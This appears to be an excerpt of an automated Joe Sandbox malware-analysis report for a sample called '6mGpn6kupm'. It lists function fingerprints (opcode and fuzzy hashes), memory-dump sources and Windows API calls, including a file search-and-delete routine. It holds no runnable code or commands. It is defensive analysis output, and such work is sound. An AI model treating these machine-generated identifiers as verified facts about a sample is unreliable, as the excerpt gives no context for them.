                                                                                                              • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(?,?,00437800,774D2EE0,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$\*.*
                                                                                                              • API String ID: 2035342205-351390296
                                                                                                              • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .5q
                                                                                                              • API String ID: 0-3553790735
                                                                                                              • Opcode ID: 6080d2d5fe55420945f157f19ce48c27487cadad17b68b38d2ef8901367cf4c1
                                                                                                              • Instruction ID: e41672c0c65a41ddfeb2b0df8b4ddb5391be338f1a17afc5680f8a3f3c4998b7
                                                                                                              • Opcode Fuzzy Hash: 6080d2d5fe55420945f157f19ce48c27487cadad17b68b38d2ef8901367cf4c1
                                                                                                              • Instruction Fuzzy Hash: 18528D74E01228CFDB64DF69C884B9DBBB2BF89301F5081E9D819A7255DB359E82CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93fce6da5e3b1767b10f193295794dd48f3b84cad619d9358a99d25f674d47cb
                                                                                                              • Instruction ID: 94aecdd55157ed25af807c49a70d46af22480f39d70961b5ddb7a23c8a67ce2c
                                                                                                              • Opcode Fuzzy Hash: 93fce6da5e3b1767b10f193295794dd48f3b84cad619d9358a99d25f674d47cb
                                                                                                              • Instruction Fuzzy Hash: 7CC18E74E00218CFEB14DFA9C994B9DBBB2BB89300F5081A9D419BB355DB359E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ef8e89e9e3c01856221ca77d71aa55e626b8de8d184c7d254380da13d3fd143
                                                                                                              • Instruction ID: 899c182c5704cd149a6f56f5b08e6949265041c50c8949a477e6d8902d09aab7
                                                                                                              • Opcode Fuzzy Hash: 8ef8e89e9e3c01856221ca77d71aa55e626b8de8d184c7d254380da13d3fd143
                                                                                                              • Instruction Fuzzy Hash: 21C19F74E00218CFEB14DFA9C994B9DBBB2BF89304F5081A9D809AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1e3f613636f0e0a04bb9fd63b226b8f76cc61cbd0fafdb7164e318882b76c50e
                                                                                                              • Instruction ID: f0dd11f83978c3503d159cac7d3840d37d0b5f10e5a96813b8d7fca2c37f45c3
                                                                                                              • Opcode Fuzzy Hash: 1e3f613636f0e0a04bb9fd63b226b8f76cc61cbd0fafdb7164e318882b76c50e
                                                                                                              • Instruction Fuzzy Hash: BDC19074E10218CFEB14DFA9C994B9DBBB2BF89300F5081A9D809AB355DB355A86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4fef7274893c717712d4059f2def45c183d63c201f39a96574eda9880d9263ba
                                                                                                              • Instruction ID: b6a1bb5f2d060aca3233c8f2ee74177180f6c3d3b21c4074f7b46ebb9c68d102
                                                                                                              • Opcode Fuzzy Hash: 4fef7274893c717712d4059f2def45c183d63c201f39a96574eda9880d9263ba
                                                                                                              • Instruction Fuzzy Hash: D2C19074E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D409AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ba66843e89227144ce1557369f255394e446e0e2e8a0a1c47c59a47363c10b4
                                                                                                              • Instruction ID: 30729690f717a9b20e4bc3cfbf540ecf1916e5dd4fcdd5fdf83c7db0a478aef7
                                                                                                              • Opcode Fuzzy Hash: 6ba66843e89227144ce1557369f255394e446e0e2e8a0a1c47c59a47363c10b4
                                                                                                              • Instruction Fuzzy Hash: 67C1AF74E00218CFEB14DFA9C994B9DBBB2BF89300F5080A9D419AB365DB355E86CF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 641c246c8d8ff3306448890f746fc5d8f2091192b4cf37d256278444cda026fd
                                                                                                              • Instruction ID: 1c94b4ae65989e50597a31f9d205de7cfe884d0cb926b0609916c705fb6e1961
                                                                                                              • Opcode Fuzzy Hash: 641c246c8d8ff3306448890f746fc5d8f2091192b4cf37d256278444cda026fd
                                                                                                              • Instruction Fuzzy Hash: 36C1AF74E00218CFEB54DFA9C994B9DBBB2BF89300F6081A9D409AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 14a8504eafb5bc63c21dc5be76b770d2d5459eff4d4eeb6e8dacaa2853a0e20e
                                                                                                              • Instruction ID: 808cea87e37f0ebb76c54ee496ad38b61d97d4b57d17253f133fd7b903b286ec
                                                                                                              • Opcode Fuzzy Hash: 14a8504eafb5bc63c21dc5be76b770d2d5459eff4d4eeb6e8dacaa2853a0e20e
                                                                                                              • Instruction Fuzzy Hash: 57C19F74E00258CFEB14DFA9C994B9DBBB2BF89300F5081A9D809AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf426f77454030c87b9c9ec5458eedb937274b7a9a31628c0af29faacd0a79f7
                                                                                                              • Instruction ID: 31bab5245a96051c659cfc08216755229f44b833eecf9a8ff28ca2b97b4188d9
                                                                                                              • Opcode Fuzzy Hash: bf426f77454030c87b9c9ec5458eedb937274b7a9a31628c0af29faacd0a79f7
                                                                                                              • Instruction Fuzzy Hash: B7C19F74E00258CFEB14DFA9C994B9DBBB2BF89300F5081A9D409AB355DB359E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 275c602aa136c884908866646f11cf1392a7414ca972c459028b061e0386e2be
                                                                                                              • Instruction ID: cce55dde944a1309faaeb5a35c17d5d3bd3f1c0138085b2bc1fd668c7de537ef
                                                                                                              • Opcode Fuzzy Hash: 275c602aa136c884908866646f11cf1392a7414ca972c459028b061e0386e2be
                                                                                                              • Instruction Fuzzy Hash: 13C1A074E00218CFEB54DFA9C994B9DBBB2BF89300F5080A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ae411fcb6981ce7f57ddf47d8d8540162c657f90ef35b667b62d009896dd4a1
                                                                                                              • Instruction ID: a46946501dda7db2d21415e23abc67d51d62ceac632a09c32610bd7f58a36cc8
                                                                                                              • Opcode Fuzzy Hash: 2ae411fcb6981ce7f57ddf47d8d8540162c657f90ef35b667b62d009896dd4a1
                                                                                                              • Instruction Fuzzy Hash: 6FC19074E00218CFEB14DFA9C994B9DBBB2BF89304F5081A9D819AB355DB355E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4adbe37669dc72a1e74be97aa094041380778100bd995f61e5b08ee4e9037318
                                                                                                              • Instruction ID: 456bb6ad8a93160697ed3b420e95622c431dccda4cd647f01330b310e9bf392c
                                                                                                              • Opcode Fuzzy Hash: 4adbe37669dc72a1e74be97aa094041380778100bd995f61e5b08ee4e9037318
                                                                                                              • Instruction Fuzzy Hash: 2EC19F74E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb3a8ae74f8a4b9fdd5e99f028117efde110dd712011a2a92057747b6b0f2512
                                                                                                              • Instruction ID: 2b6f6f6d0ccae7b99a3824b984ab6337cde5658c0848321f7280f6235be373ec
                                                                                                              • Opcode Fuzzy Hash: cb3a8ae74f8a4b9fdd5e99f028117efde110dd712011a2a92057747b6b0f2512
                                                                                                              • Instruction Fuzzy Hash: 68C19174E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 71ae6c8b501a2b3c54aeb902c869fdf485f852316d94c0b20a9749671108afb8
                                                                                                              • Instruction ID: 0f17b62c5650373b2a9253d701e1ed20d3483e4c34c43915042e6e303775678d
                                                                                                              • Opcode Fuzzy Hash: 71ae6c8b501a2b3c54aeb902c869fdf485f852316d94c0b20a9749671108afb8
                                                                                                              • Instruction Fuzzy Hash: 2CC18174E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6502172ef46d757eebbf14caa561996cfa0a24218ca92d386ae967bba77bcaa9
                                                                                                              • Instruction ID: 8dd2bfc752a47792f3c2ee3e458ef9810a36c16adacc70cd19ce78b7969f9824
                                                                                                              • Opcode Fuzzy Hash: 6502172ef46d757eebbf14caa561996cfa0a24218ca92d386ae967bba77bcaa9
                                                                                                              • Instruction Fuzzy Hash: 9CC18F74E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819BB355DB355A86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f5a1315436e65d31e0f0363592b27ffbd15ad3b86aee2987afee2c3d02a1a616
                                                                                                              • Instruction ID: b1a6a37b2e4c581b38adc60bb961c33657bbdf71847119a0478bfd08ee37973d
                                                                                                              • Opcode Fuzzy Hash: f5a1315436e65d31e0f0363592b27ffbd15ad3b86aee2987afee2c3d02a1a616
                                                                                                              • Instruction Fuzzy Hash: C7C18174E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2c72f7048c7460fb2f958eba77d100041e5418b9715aaeae073472e510082d63
                                                                                                              • Instruction ID: 31d7e2c27a437087eddb3d3c60ee03975ed3544ecaf121b602ad0bdebf26ac91
                                                                                                              • Opcode Fuzzy Hash: 2c72f7048c7460fb2f958eba77d100041e5418b9715aaeae073472e510082d63
                                                                                                              • Instruction Fuzzy Hash: 1FC18F74E00218CFEB14DFA9C994B9DBBB2BF89300F6081A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1e1ffda3776ebfdd4bebd06c4f58dc18adba2de339125b34e420eff950065b71
                                                                                                              • Instruction ID: ed6e78b5a22889db2a23a537dd2972a4d0e3bbbe855274566c9a6735687f26f6
                                                                                                              • Opcode Fuzzy Hash: 1e1ffda3776ebfdd4bebd06c4f58dc18adba2de339125b34e420eff950065b71
                                                                                                              • Instruction Fuzzy Hash: 0EC18274E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB395DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 279cc4108f2cbdb595d3cf27308edfed9d36f221e6e3436a468f4a8ddfd19d1c
                                                                                                              • Instruction ID: 8dc550f562667ce553ff047f5ad0c210e4aefea307fb0451bcfb5abe17c36386
                                                                                                              • Opcode Fuzzy Hash: 279cc4108f2cbdb595d3cf27308edfed9d36f221e6e3436a468f4a8ddfd19d1c
                                                                                                              • Instruction Fuzzy Hash: 8EC18174E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 396bbef12aa4e19a71ce8e9e51f5baee76cbfc278437df95b4ec9b23e4f77a6a
                                                                                                              • Instruction ID: d1d9a2b5c5d82c081aee853058aa27f854614ca1a467f652ecce00abd0d9ee5a
                                                                                                              • Opcode Fuzzy Hash: 396bbef12aa4e19a71ce8e9e51f5baee76cbfc278437df95b4ec9b23e4f77a6a
                                                                                                              • Instruction Fuzzy Hash: A8C19F74E00218CFEB14DFA9C994B9DBBB2BF89301F5081A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4199af0f555459349f49c68d16234d357544823556e1e17b9e0c3536be69e6c1
                                                                                                              • Instruction ID: fd459ccdb6c6ea28d382e0d42caa7a561754415dabac89204314b75a8562e162
                                                                                                              • Opcode Fuzzy Hash: 4199af0f555459349f49c68d16234d357544823556e1e17b9e0c3536be69e6c1
                                                                                                              • Instruction Fuzzy Hash: EBC18074E00218CFEB14DFA9C994B9DBBB2BF89300F6081A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c520798bd730ddf3efc07305d888bf8e2cba16b0aa1b204276c86a61bb9004fc
                                                                                                              • Instruction ID: e84707a5b3ba9d2e1108a95dd672d4da32b02a462a5e3be45cc3fc8643986eb3
                                                                                                              • Opcode Fuzzy Hash: c520798bd730ddf3efc07305d888bf8e2cba16b0aa1b204276c86a61bb9004fc
                                                                                                              • Instruction Fuzzy Hash: 61C18F74E00258CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3aecae91ad84db7c1e09c5a1fbe9724518fe3c56c86fb400968b7e13077f3f7
                                                                                                              • Instruction ID: 42ca59272e583620faac570170c7787f155b20b75371b5c7739ee932b31c1a71
                                                                                                              • Opcode Fuzzy Hash: a3aecae91ad84db7c1e09c5a1fbe9724518fe3c56c86fb400968b7e13077f3f7
                                                                                                              • Instruction Fuzzy Hash: 93C18F74E00218CFEB14DFA9C994B9DBBB2BF89304F5081A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9cddfa9fe7936c70b9378e7eec06ca2d94a6b156c7d1c124e3a2d0ec96866d8
                                                                                                              • Instruction ID: fd44a62ca6fdff41f64f8319644d67a25760bbc5002c2b60f5db3c9a7d4fed55
                                                                                                              • Opcode Fuzzy Hash: f9cddfa9fe7936c70b9378e7eec06ca2d94a6b156c7d1c124e3a2d0ec96866d8
                                                                                                              • Instruction Fuzzy Hash: D2C19074E00218CFEB14DFA9C994B9DBBB2BF89300F5080A9D819AB355DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eeb38c08b6acec085a95d7945bed562dbd0968e0e8d2f06d8d65b96ffe137fd6
                                                                                                              • Instruction ID: 9c710d919b60121b093a68a0fc19f9a8c2a8bfffd5f1f2ffa3c100796967f78f
                                                                                                              • Opcode Fuzzy Hash: eeb38c08b6acec085a95d7945bed562dbd0968e0e8d2f06d8d65b96ffe137fd6
                                                                                                              • Instruction Fuzzy Hash: F3C18F74E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9da39f6946b1bab8b9db24517d827765834120a3f7293c95431e8c25013e12a
                                                                                                              • Instruction ID: 0743a81ac10c9c419c7b6ff4503dd515b19a75854793ef633314ce7e466a5204
                                                                                                              • Opcode Fuzzy Hash: a9da39f6946b1bab8b9db24517d827765834120a3f7293c95431e8c25013e12a
